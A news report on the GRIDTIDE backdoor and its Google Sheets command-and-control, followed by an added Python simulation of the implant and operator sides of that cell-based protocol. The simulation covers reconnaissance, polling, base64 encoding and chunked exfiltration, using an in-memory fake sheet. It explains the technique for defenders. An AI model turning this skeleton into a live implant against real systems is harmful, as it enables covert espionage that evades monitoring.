Cyber: Chinese Cyberspies Breached Dozens Of Telecom Firms, Govt Agencies
Google’s Threat Intelligence Group (GTIG), Mandiant, and partners disrupted a global espionage campaign attributed to a suspected Chinese threat actor that used SaaS API calls to hide malicious traffic in attacks targeting telecom and government networks.
The campaign has been active since at least 2023 and has impacted 53 organizations in 42 countries, with suspected infections in at least 20 more countries.
The initial access vector is unknown, but the researchers note that the threat actor, which Google tracks internally as UNC2814, has previously gained access by exploiting flaws in web servers and edge systems.
Google says that in the recently disrupted campaign, the actor deployed a new C-based backdoor named ‘GRIDTIDE,’ which abuses the Google Sheets API for evasive command-and-control (C2) operations.
GRIDTIDE authenticates to the Google Sheets API as a Google service account using a private key hardcoded in the binary. On launch it clears the working spreadsheet by deleting rows 1-1000 and columns A through Z.
It then performs host reconnaissance, collecting the username, hostname, OS details, local IP address, locale, and timezone, and writes that data to cell V1.
Cell A1 is the command/status cell, which GRIDTIDE polls continuously for instructions.
If an instruction is present, the malware reads it and overwrites A1 with a status string. If the cell is empty, it retries once per second, up to 120 times, then falls back to random 5-10 minute check-ins to reduce the noise the polling generates.
Cells A2 through An hold command output, files being exfiltrated, and tools uploaded to the host.
Google reports that GRIDTIDE encodes its exchanges with the C2 spreadsheet in URL-safe base64, so the traffic passes as ordinary Google Sheets API requests and evades web-monitoring tools keyed on suspicious domains or payloads. Base64 is encoding, not encryption: once the spreadsheet or the API traffic is identified, the cell contents decode trivially.
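The cell protocol described above, as an added simulation that is not GRIDTIDE's code and was not published by Google or BleepingComputer. An in-memory FakeSheet stands in for the Google Sheets API, so nothing here contacts Google; the cell layout (A1 for command/status, A2..An for output, V1 for recon), the startup wipe, the URL-safe base64 encoding and the 120 x 1 s then 5-10 minute polling schedule follow the article, while the `STATUS:` string format, the per-cell chunk size and the command handler passed to `Implant` are assumptions made for this illustration.

```python
"""Simulated spreadsheet C2 in the style described for GRIDTIDE.
FakeSheet replaces the Sheets API; the status-string format, chunk
size and command handler are assumptions, not the malware's values."""
import base64
import getpass
import json
import locale
import platform
import random
import socket
import time


def b64url_encode(data: bytes) -> str:
    """URL-safe base64 without '=' padding: only [A-Za-z0-9_-], so the
    value sits in a cell and in a request body like any opaque token."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    """Inverse of b64url_encode; restores the padding that was stripped."""
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


class FakeSheet:
    """Minimal spreadsheet: cells keyed by A1-style references."""

    def __init__(self):
        self.cells = {}

    def clear(self, max_row=1000, last_col="Z"):
        """Startup wipe from the article: rows 1-1000, columns A-Z."""
        for col in range(ord("A"), ord(last_col) + 1):
            for row in range(1, max_row + 1):
                self.cells.pop(f"{chr(col)}{row}", None)

    def get(self, ref):
        return self.cells.get(ref, "")

    def put(self, ref, value):
        self.cells[ref] = value


def host_recon() -> dict:
    """The fields the article says are collected before the first poll."""
    try:
        user = getpass.getuser()
    except Exception:  # no passwd entry / USER unset in some sandboxes
        user = "?"
    try:  # UDP connect sends no packet; it only picks the outbound interface
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        s.connect(("192.0.2.1", 9))
        ip = s.getsockname()[0]
        s.close()
    except OSError:
        ip = "?"
    try:
        loc = locale.getlocale()[0] or "?"
    except ValueError:
        loc = "?"
    return {"user": user, "host": socket.gethostname(), "ip": ip,
            "os": f"{platform.system()} {platform.release()}",
            "locale": loc, "tz": time.strftime("%Z")}


def next_delay(empty_polls: int, rng=random.random) -> float:
    """Seconds before the next A1 check: 1 s for the first 120 empty polls,
    then a random 5-10 minute interval to cut the polling noise."""
    if empty_polls < 120:
        return 1.0
    return 300.0 + rng() * 300.0


class Implant:
    CHUNK = 40_000  # assumed per-cell size; a Sheets cell caps at 50,000 chars

    def __init__(self, sheet, run_command):
        self.sheet = sheet
        self.run_command = run_command  # callable(str) -> bytes, caller-supplied

    def start(self):
        self.sheet.clear()
        self.sheet.put("V1", b64url_encode(json.dumps(host_recon()).encode()))

    def poll_once(self) -> bool:
        """Check A1; return True if a command was found and executed."""
        cell = self.sheet.get("A1")
        if not cell:
            return False
        command = b64url_decode(cell).decode()
        self.sheet.put("A1", b64url_encode(b"STATUS:running"))  # assumed format
        encoded = b64url_encode(self.run_command(command))
        chunks = [encoded[i:i + self.CHUNK] for i in range(0, len(encoded), self.CHUNK)]
        for row, chunk in enumerate(chunks, start=2):  # A2, A3, ... An
            self.sheet.put(f"A{row}", chunk)
        self.sheet.put("A1", b64url_encode(b"STATUS:done"))
        return True


def operator_task(sheet, command: str):
    """Operator side: place an encoded command in A1."""
    sheet.put("A1", b64url_encode(command.encode()))


def operator_collect(sheet) -> bytes:
    """Operator side: reassemble A2..An and decode the output."""
    parts, row = [], 2
    while sheet.get(f"A{row}"):
        parts.append(sheet.get(f"A{row}"))
        row += 1
    return b64url_decode("".join(parts))


if __name__ == "__main__":
    sheet = FakeSheet()
    bot = Implant(sheet, lambda cmd: f"[simulated output of {cmd!r}]".encode())
    bot.start()
    operator_task(sheet, "whoami")
    bot.poll_once()
    print("A1:", b64url_decode(sheet.get("A1")).decode(), "| out:", operator_collect(sheet))
```

Because the padding is stripped once from the whole encoded string rather than per chunk, concatenating A2..An in order restores the exact base64 text, so chunk boundaries need not fall on 4-character groups. The same `b64url_decode` is all a defender needs to read recovered cells or captured request bodies.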
Source: BleepingComputer